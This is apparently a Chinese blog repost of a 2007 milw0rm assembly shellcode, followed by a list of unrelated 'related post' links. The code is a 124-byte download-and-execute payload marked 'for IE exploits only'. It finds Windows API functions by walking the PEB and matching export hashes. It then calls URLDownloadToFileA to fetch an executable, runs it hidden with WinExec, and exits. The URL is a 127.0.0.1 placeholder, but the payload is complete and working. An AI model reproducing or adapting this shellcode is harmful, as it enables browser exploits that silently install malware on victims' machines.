Download Example
2024-05-11 20:50:30
Download file from internet 的一个例子。 程序不能够单独run,需要在URLMON.dll 被load 的process 中运行,作者说是为IE 注入。
;; relocateable dynamic runtime assembly code example using hash lookup *** for IE exploits only ***; the URLMON.DLL must already be loaded into the process space for this to work, so do not run on its own!!;; to test use /DTEST_CODE in ml command line;; URLDownLoadToFileA() / WinExec() / ExitProcess() | ExitThread();; 124 bytes;; for testing:;; ml /c /coff /Cp /DTEST_CODE dexec32.asm; link /subsystem:windows /section:.text,w dexec32.obj urlmon.lib;; wyse101 [at] gmail.com;; March 2007; .386 .model flat,stdcall
ROL_CONSTANT equ 5 ; int mrol(int iNum, int iBits) ; {return (iNum << iBits) | (iNum >> (32 - iBits);} mrol macro iNum:req,iBits:req exitm <(iNum shl iBits) or (iNum shr (32-iBits))> endm
mror macro iNum:req,iBits:req exitm <(iNum shr iBits) or (iNum shl (32-iBits))> endm
hashapi macro szApi local dwApi
dwApi = 0
forc x,szApi dwApi = dwApi + '&x' dwApi = mrol(dwApi,ROL_CONSTANT) endm dwApi = mrol(dwApi,ROL_CONSTANT) dw (dwApi and 0ffffh) endm
.code
assume fs:nothing
code_start: jmp load_dataIFDEF TEST_CODEextern URLDownloadToFileA :proc call URLDownloadToFileA ; included when assembled with /DTEST_CODEENDIFsetup_parameters: pop edi ; offset @cmd_start xor eax,eax ; eax = 0 cdq ; edx = 0 ; ******************************************************************** push eax ; exit code = 0 ; ******************************************************************** push eax ; SW_HIDE mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes push edi ; file name to execute ; ******************************************************************** push eax ; callback routine URLDownLoadToFileA push eax ; reserved, must be zero push edi ; file name to save as add edi,edx ; get offset of @url_start-1 stosb ; zero tail end mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url push edi ; url to download file from push eax ; interface add edi,edx ; get offset of @urlmon-1 stosb ; zero tail end of url ; *********************************************************************load_modules: push edi ; save current offset to hashes push 30h pop ecx mov eax,fs:[ecx] ; PEB base address mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleListscan_dll: mov ebx,[ebp+8] ; DllBase mov ebp,[ebp] ; Flink push ebp ; save
mov eax,[ebx+3ch] mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames lodsd xchg eax,ecx ; ecx = NumberOfNames
lodsd add eax,ebx ; AddressOfFunctions push eax
lodsd lea edi,[eax+ebx] ; AddressOfNames
lodsd lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinalsload_api: mov esi,[edi+4*ecx-4] add esi,ebx xor eax,eax cdqhash_api: lodsb add edx,eax rol edx,ROL_CONSTANT dec eax jns hash_api
mov esi,[esp+8] ; get api hashes cmp dx,word ptr[esi] ; found a match? je call_api
loop load_api pop eax ; check pop ebp ; jmp scan_dllcall_api: pop eax movzx edx,word ptr [ebp+2*ecx-2] add ebx,[eax+4*edx] pop ebp ; modules pop edi ; api hashes call ebx ; call api stosw ; advance 2 bytes to next hash jmp load_modules ; do another, just keep going until ExitProcess is reached. ; *************************load_data: call setup_parameters@cmd_start: db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE);@cmd_end:@url_start: db 'http://127.0.0.1/file.exe',0ffh ; url of file to download@url_end: hashapi <URLDownloadToFileA> hashapi <WinExec> hashapi <ExitProcess> ; *********************************************************************
end code_start
; milw0rm.com [2007-06-14]
Download Example相关推荐
- Error:Could not download guava.jar (com.google.guava:guava:19.0): No cached version available for of
今天从git导入demo 报错 Error:Could not download guava.jar (com.google.guava:guava:19.0): No cached version ...
- Resource punkt not found.nltk.download()下载失败
Resource punkt not found.&&nltk.download()下载失败 LookupError: ******************************** ...
- C++ 使用 curl 进行 http 请求(GET、POST、Download)的封装
修改自网路 CommonTools.h /** CommonTools.h** Created on: 2018年8月2日* Author: didi*/ #include <iostream& ...
- R 语言 download.file 的几点知识
R 语言中,不管是安装包,还是下载数据,很多时候都会用到download.file这个函数.如果你在安装包或者下载数据过程中出现中断,或者异常,想要判断是远程源服务器的问题,还是自身服务器的问题,还是 ...
- R语言使用download.file函数下载网络文件到本地(Download File from the Internet)
R语言使用download.file函数下载网络文件到本地(Download File from the Internet) 目录 R语言使用download.file函数下载网络文件到本地(Down ...
- vue-cli · Failed to download repo vuejs-templates/webpack: tunneling socket could not be established
vue-cli · Failed to download repo vuejs-templates/webpack: tunneling socket could not be established ...
- OSError: Unable to download 'ffmpeg.win32.exe'. Perhaps there is a no internet connection? If there
OSError: Unable to download 'ffmpeg.win32.exe'. Perhaps there is a no internet connection? If there ...
- 基于layer mobile手机端弹出框,询问框(PC端推荐layer和artDialog:http://download.csdn.net/download/cometwo/9437895)...
layer mobile是为移动设备(手机.平板等webkit内核浏览器/webview)量身定做的弹层支撑,采用Native JavaScript编写,完全独立于PC版的layer,您需要按照场景选 ...
- Download interrupted: URL not found.
Download interrupted: URL not found. androidURL not found 应该是url被墙了.可以试下:启动 Android SDK Manager ,打开主 ...
- python -m spacy download en”究竟做了什么?(What does “python -m spacy download en” exactly do?
python -m spacy download en"究竟做了什么?(What does "python -m spacy download en" exactly d ...
最新文章
- iview中的Col在vue/html-self-closing中识别错误
- Windows 路由追踪tracert命令使用示例
- Android调试工具_ Stetho
- SQL case when 2种用法
- IdentityServer4实战 - JWT Token Issuer 详解
- python画精美图案_Python语言的魅力------完美图案
- 【Sqoop】从MySQL同步数据到Hive的操作参数解析
- Android——ImageView报错:不是可绘制对象(颜色或路径)
- sklearn特征选择类库使用小结
- atitit.高性能遍历 文本文件行 attilax总结
- sql boolean类型_零编程基础转行数据分析,先学SQL还是先学Python?
- UE4GamePlay框架
- 【今日CV 计算机视觉论文速览 第144期】Wed, 17 Jul 2019
- 更好的图片压缩途径: WebP探索之路
- Eviction Kill POD选择分析
- Golang学习日志 ━━ Gin-Vue-Admin按步骤手动创建api及router、service
- html网页早发白帝城,早发白帝城古诗
- 【Redis】Redis常用命令
- 51单片机控制二相四线步进电机
- npm install一直报错equest to https://registry.npm.taobao.org/underscore failed, reason: Client network